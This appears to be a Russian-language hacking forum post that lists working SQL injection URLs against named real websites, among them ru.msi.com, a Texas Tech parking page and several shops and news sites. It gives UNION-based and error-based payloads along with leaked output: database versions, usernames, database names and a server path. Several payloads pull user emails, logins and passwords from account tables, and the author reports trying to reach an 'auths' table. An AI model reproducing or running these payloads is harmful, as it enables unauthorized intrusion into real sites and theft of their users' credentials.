SQL Инъекции

http://scores.crazymonkeygames.com/hs/listscores.php?id=-1+UNION+SELECT+concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5+FROM+information_schema.tables--

<title>Today's crazymon_hs@cmgn-n2-int:crazymon_highscores:5.0.27-standard High Scores</title>
ну вы понеле, вывод в тайтле

 

Code:

http://www.designarkivet.se/index.php?pageid=123%27%20AND%201=0%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,23,24,25,26,27,28,29,30,31+--+

Версия MySQL 4.1.22-community-nt
Имя пользователя cms@localhost
Имя БД cms_designarkivet

 

http://iw-shop.ru/index.php?ukey=news&blog_id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+SC_news_table+group+by+2+limit+1)a)--+

 

Code:

http://www.ogm-bodyboard-shop.com/bodyboard_shop.php?num=1-999.9+union+select+1,2,3,4--

версия 5.0.90-log
бд [email protected]
имя ogmbodyb002

 

Code:

http://cps.softex.br/noticia_interna.php?id=-1433+union+select+1,2,3,4,5,6,7,8,concat_ws(0x20,id,email,login,senha),10,11,12,13,14,15,16,17+from+tbUsuarios--

 

Вроде как не баян, проверял
msi.com тИЦ — 1000 PR — 7

Code:

http://ru.msi.com/program/products/vga/vga/pro_vga_detail_new.php?UID=-21149+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema='msi'+--+

 

Code:

http://www.poroszlo.hu/en/szallas.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
http://inita.hu/references/ref.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--

 

http://forsmaster.ru/index.php?id=-53+union+select+1--

 

https://epark.ttu.edu/parking_web/news/news.php?dnf_id=14+union+select+null,to_char(table_name),null,null+from+sys.all_tables

 

http://video.rosbalt.ru/channel_detail.php?chid=-29 union select 1,user(),group_concat(email,username,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16 from signup--+7

 

http://www.khanscope.com/productdetails.cfm?productID=1194+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--

 

Code:

http://php88.free.fr/bdff/act.php?ID=-2010+union+select+1,2,version(),4--
http://motocykel.sk/clanok.php?id=-2010+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

 

Путь к месту расположения скрипта:
/home/hosting_users/skysj48/www/item/detail.php

MySQL Version: 4.0.22-log
Database Name: skysj48
Username: skysj48@localhost

 

Code:

http://www.hammer-marcopolo.de/links/links.php?cat_id=-47+and+1=0++and+1=0++and+1=0+=null=null+Union+Sele ct+1,2,3,4,5,6,7,0x4861636B656420627920494E432E,9, 10,11,12,13,14,15,16,17,18--

 

Code:

http://www.rek.ee/eng/ettevote.php?id=32+and+substring(version(),1,1)=5

// http://www.rek.ee/eng/ettevote.php?id=32+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31

 

5.0.51a-24+lenny4-log
[email protected]
elephant_se

 

Code:

http://www.indiacon.com/businesscards.php?Id=1-2.1+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13+from+information_schema.tables--

5.0.91-community-log

indiacon@localhost

indiacon

 

Code:

http://www.lokomotive.lv/index.php?cat=1&subrubid=1378+and+1=0+union+select+1,2,3,concat_ws(0x2f,version(),user(),database()),5,6,7,8,9,10,11

Version : 5.0.75-0ubuntu10.05-log
user : vagels@localhost
db : vagels

 

Code:

http://www.gamesmarket.com.au/info.php?type=90+and+0+union+select+1,2,concat_ws% 280x3a,user%28%29,database%28%29,version%28%29%29, 4,5,6--+ 

vs80127_1_dbo[@]bne2-0030dp.server-web.com:vs80127_1:4.0.24-nt-max-log

 

Code:

http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.tables+--+

5.0.91-community
suncell@localhost
suncellular

в таблице auths поля user и pass. но вот достать не получается, доступа чтоли к таблице нет